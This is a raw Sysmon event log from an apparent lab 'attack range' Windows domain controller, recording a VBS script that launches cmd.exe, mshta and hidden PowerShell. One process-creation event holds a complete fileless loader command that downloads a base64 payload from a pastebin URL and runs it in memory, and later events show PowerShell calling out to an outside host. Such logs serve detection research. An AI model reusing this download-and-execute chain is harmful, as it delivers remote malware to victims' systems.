08:00:52.077{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106859Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.077{58E9C193-B4B4-615A-3802-00000000FC01}64564528C:\Windows\System32\WScript.exe{58E9C193-B4B4-615A-3902-00000000FC01}6680C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\SHELL32.dll+3ccff|C:\Windows\System32\SHELL32.dll+3cb8c|C:\Windows\System32\SHELL32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106858Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.083{58E9C193-B4B4-615A-3902-00000000FC01}6680C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/rQL02r6C').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" 10341000x8000000000000000106857Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.077{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\WScript.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106856Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.077{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000106855Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.039{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\Temp.lnk2021-10-04 07:44:21.848 23542300x8000000000000000106854Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.039{58E9C193-AE68-615A-C800-00000000FC01}4548ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\Temp.lnkMD5=BF16D310C4026EA69AE9E40D18DBD1BA,SHA256=D1174ECEABA41B4A06A5802D5C37CEA28B973D275639975D74BDBE4DB2A0093B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000106853Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.039{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\_______ _____ ___ ______ ______.vbs.lnk2021-10-04 07:44:21.816 23542300x8000000000000000106852Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.039{58E9C193-AE68-615A-C800-00000000FC01}4548ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\_______ _____ ___ ______ ______.vbs.lnkMD5=00F22BD6BF83E1F34154453BDCD84DF1,SHA256=A7DD6EF37B6787B7F6DB8D2ECD6E58B967275A1A6D029BFBC3AE33B5EF04A8F4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106851Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.024{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106850Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.024{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\WScript.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106849Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.024{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\WScript.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106848Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.008{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106847Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.008{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106846Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.008{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106845Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.008{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106844Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.008{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\WScript.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106843Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.008{58E9C193-AE68-615A-C800-00000000FC01}45484816C:\Windows\Explorer.EXE{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\WScript.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\windows.storage.dll+ad62a|C:\Windows\System32\windows.storage.dll+ad3e2|C:\Windows\System32\SHELL32.dll+3f8bd|C:\Windows\System32\SHELL32.dll+3e456|C:\Windows\System32\SHELL32.dll+801d1|C:\Windows\System32\SHELL32.dll+6716e|C:\Windows\System32\SHELL32.dll+18cf2c|C:\Windows\System32\SHELL32.dll+18cc83|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106842Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.019{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\wscript.exe5.812.10240.16384Microsoft ® Windows Based Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=95B2CC3A306C4C1059A53B660096F0A5,SHA256=8B2E206D1F6B510AD73C7541C03F39F9E4DDD7E3D1B9E31F3C8829C64B42E075,IMPHASH=661A40859BC6D47752E9FC5E02C1862C{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x8000000000000000107031Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:53.956{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05B30105F2F22CD271B996F1A1FA54E5,SHA256=132F3745CAFCA508AC947E1DE030C7E746E5128E35BB41420F273074C2A135E9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107030Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.937{58E9C193-B4B4-615A-3D02-00000000FC01}7540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51866-false62.240.36.45vweb10.lttnet.net80http 23542300x800000000000000083258Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:53.230{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71B2668AE7D3CAA177E388B3C735AADE,SHA256=2D57B1CC1BEDE5FBC8AA1746FE24B7B51DB9A1446AA21AB417F48E76097BC89F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107029Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:53.194{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B2D218480F3C2A3E39FA7F1103FB1CAD,SHA256=C1FBF836D90D672C299FA5BAB202674795199191A4BCF30FC569588B69697757,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107028Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:53.194{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A98D100534F6D9C10225DA420C62408B,SHA256=1803C8E613F9D321012E7799408426DCEB66AF711BD8F689AC2C2F8C74DB8E97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107027Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:53.194{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F55B11330498763A1106C0706D976864,SHA256=B2E2FC42AD73DE8D70CEE5E709A2929B19F7840295DC49BFFBD7BE7AEC8B3556,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107026Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:53.041{58E9C193-B4B4-615A-4402-00000000FC01}5708ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107025Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:53.025{58E9C193-B4B4-615A-4602-00000000FC01}7216ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107024Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.994{58E9C193-B4B4-615A-3D02-00000000FC01}7540ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083259Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:54.230{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CB57B58A5CAC953E649B7201DD7A902,SHA256=939A7A34BCA87D5420BEC23D6508D16A793C71212C145FDF0DD4192ADF2CE34D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107039Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:53.009{58E9C193-B4B4-615A-4602-00000000FC01}7216C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51868-false62.240.36.45vweb10.lttnet.net80http 354300x8000000000000000107038Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.968{58E9C193-B4B4-615A-4402-00000000FC01}5708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51867-false62.240.36.45vweb10.lttnet.net80http 354300x8000000000000000107037Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.940{58E9C193-B4B4-615A-3B02-00000000FC01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51865-false62.240.36.45vweb10.lttnet.net80http 22542200x8000000000000000107036Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.971{58E9C193-B4B4-615A-4602-00000000FC01}7216libya2020.com.ly0::ffff:62.240.36.45;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x8000000000000000107035Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.920{58E9C193-B4B4-615A-4402-00000000FC01}5708libya2020.com.ly0::ffff:62.240.36.45;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x8000000000000000107034Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.896{58E9C193-B4B4-615A-3D02-00000000FC01}7540libya2020.com.ly0::ffff:62.240.36.45;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x8000000000000000107033Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.894{58E9C193-B4B4-615A-3B02-00000000FC01}5176libya2020.com.ly0::ffff:62.240.36.45;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000107032Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:54.041{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0E06CE08947C6D127EBB033C218B8CE3,SHA256=EB3E3903D4F888A9FFA23EB510A14EA9710D916D553995AE8CB5A576728ADEC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107040Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:55.008{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37D7EB1CF1A51A6904CA4C14FC03638B,SHA256=FB5EB5780BED29355B6F005A801C983EE23DBA53A91A91B853A75DFDDD3CD8C0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083261Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:52.692{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50150-false10.0.1.12-8000- 23542300x800000000000000083260Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:55.230{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8C51F46C89187F34AD5324D702B3A25,SHA256=61DA89C8677593EB886431BC78ED20FA007A3779EE9475DE63B7F3922F3A1EF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083262Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:56.246{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C9679D84E0A6506F728BA00365CA518,SHA256=2172A6E9B525D9B4257E1B4BBEFD802D1A2B40BA8F92B29AEEDBB971369FC8E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107041Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:56.023{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5AB12E84B1801A1AC4032BD6FCD94BC,SHA256=E8CC4706592E555B9165E1DDF05D8C298BD7620BC87C1839567C6574A4284605,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083263Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:57.250{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CC44CE12FAF980D415FDFFEF2943198,SHA256=83296583ACA43F884FF67723306879DDF945FDA3733435F710048EDE3209D307,IMPHASH=00000000000000000000000000000000falsetrue 